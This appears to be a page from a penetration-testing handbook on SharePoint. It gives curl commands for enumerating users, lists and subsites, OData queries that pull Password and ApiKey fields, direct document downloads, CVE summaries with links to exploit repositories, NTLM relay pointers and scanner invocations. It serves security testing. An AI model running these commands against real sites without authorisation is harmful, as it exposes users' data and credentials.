Sharepoint

Microsoft SharePoint security testing - enumeration, API misconfigurations, and exploitation.

Enumeration

Discovery

# Common SharePoint URLs to check
/_layouts/15/viewlsts.aspx
/_layouts/15/settings.aspx
/_api/web/lists
/_api/web/webs
/_api/web/siteusers
/_api/web/currentuser
/_vti_bin/client.svc
/_vti_bin/spdisco.aspx
/sites/
/_catalogs/

# Check version
/_api/web/
# Look for "MajorVersion" and "MinorVersion" in response

# SharePoint Online detection
/_layouts/15/authenticate.aspx
/personal/  # OneDrive personal sites

User Enumeration

# Get all site users (if accessible)
curl "https://sharepoint.target.com/_api/web/siteusers" \
  -H "Accept: application/json;odata=verbose"

# Get specific user info
curl "https://sharepoint.target.com/_api/web/siteusers(@v)?@v='i:0%23.f|membership|[email protected]'" \
  -H "Accept: application/json"

# Current user
curl "https://sharepoint.target.com/_api/web/currentuser" \
  -H "Accept: application/json"

List Enumeration

# Get all lists
curl "https://sharepoint.target.com/_api/web/lists" \
  -H "Accept: application/json"

# Get items from a list
curl "https://sharepoint.target.com/_api/web/lists/getbytitle('Documents')/items" \
  -H "Accept: application/json"

# Get list by GUID
curl "https://sharepoint.target.com/_api/web/lists(guid'LIST-GUID-HERE')/items"

API Misconfigurations

Exposed REST API

# Anonymous access to site data
curl "https://sharepoint.target.com/_api/web" -H "Accept: application/json"

# List all subsites
curl "https://sharepoint.target.com/_api/web/webs" -H "Accept: application/json"

# Search API (often exposed)
curl "https://sharepoint.target.com/_api/search/query?querytext='password'" \
  -H "Accept: application/json"

Permission Issues

# Check permissions
curl "https://sharepoint.target.com/_api/web/effectivebasepermissions" \
  -H "Accept: application/json"

# Check if anonymous access enabled
curl "https://sharepoint.target.com/_api/web/AnonymousAccess"

OData Query Exploitation

# Filter sensitive data
/_api/web/lists/getbytitle('Users')/items?$filter=Title eq 'admin'

# Select specific fields
/_api/web/lists/getbytitle('Config')/items?$select=Password,ApiKey

# Expand related data
/_api/web/lists/getbytitle('Documents')/items?$expand=File

Common Vulnerabilities

CVE-2019-0604 (RCE)

# Affects SharePoint 2010, 2013, 2016, 2019
# Deserialization vulnerability in EntityInstanceIdEncoder

# Detection
curl "https://sharepoint.target.com/_layouts/15/Picker.aspx"

# Exploit requires crafted ASPX page upload
# https://github.com/AhmedMohamedDev/CVE-2019-0604

CVE-2020-0646 (RCE via .NET)

# .NET deserialization in SharePoint
# Check for vulnerable endpoints accepting XML/SOAP

CVE-2020-16952 (RCE)

# Affects SharePoint 2013, 2016, 2019
# Remote code execution via malicious document

# Detection - check version and patch level

CVE-2023-29357 (Privilege Escalation)

# JWT token bypass in SharePoint Server 2019
# Allows authentication bypass

# Check if patch KB5002402 installed

File Access

Direct File Access

# Download files
curl "https://sharepoint.target.com/sites/documents/Shared%20Documents/sensitive.docx" -o file.docx

# Access via API
curl "https://sharepoint.target.com/_api/web/getfilebyserverrelativeurl('/sites/documents/file.docx')/$value" -o file.docx

Exposed Directories

# Common sensitive locations
/sites/IT/
/sites/HR/
/sites/Finance/
/Shared Documents/
/_catalogs/masterpage/
/Style Library/

Authentication Attacks

NTLM Relay

# SharePoint often uses NTLM
# Use responder/ntlmrelayx for relay attacks

# Check for NTLM
curl -v https://sharepoint.target.com 2>&1 | grep -i "WWW-Authenticate: NTLM"

Forms Authentication

# SharePoint Online / ADFS
# Get authentication cookie
curl -X POST "https://login.microsoftonline.com/GetUserRealm.srf" \
  -d "[email protected]"

Tools

# SharePoint enumeration
# https://github.com/AhmedMohamedDev/SPartan
python3 spartan.py -u https://sharepoint.target.com

# https://github.com/AhmedMohamedDev/sharepwn
python3 sharepwn.py -t https://sharepoint.target.com

# Nuclei templates
nuclei -t http/technologies/microsoft/sharepoint* -u https://sharepoint.target.com

# Fuzz endpoints
ffuf -w /usr/share/seclists/Discovery/Web-Content/sharepoint.txt \
  -u https://sharepoint.target.com/FUZZ

References

Windows AD - SharePoint often integrated with AD
SSRF - SharePoint endpoints can be SSRF targets

PreviousELK NextCI/CD Security

Last updated 8 days ago

Was this helpful?

hashtagEnumeration

hashtagDiscovery

hashtagUser Enumeration

hashtagList Enumeration

hashtagAPI Misconfigurations

hashtagExposed REST API

hashtagPermission Issues

hashtagOData Query Exploitation

hashtagCommon Vulnerabilities

hashtagCVE-2019-0604 (RCE)

hashtagCVE-2020-0646 (RCE via .NET)

hashtagCVE-2020-16952 (RCE)

hashtagCVE-2023-29357 (Privilege Escalation)

hashtagFile Access

hashtagDirect File Access

hashtagExposed Directories

hashtagAuthentication Attacks

hashtagNTLM Relay

hashtagForms Authentication

hashtagTools

hashtagReferences

hashtagRelated Topics

Enumeration

Discovery

User Enumeration

List Enumeration

API Misconfigurations

Exposed REST API

Permission Issues

OData Query Exploitation

Common Vulnerabilities

CVE-2019-0604 (RCE)

CVE-2020-0646 (RCE via .NET)

CVE-2020-16952 (RCE)

CVE-2023-29357 (Privilege Escalation)

File Access

Direct File Access

Exposed Directories

Authentication Attacks

NTLM Relay

Forms Authentication

Tools

References

Related Topics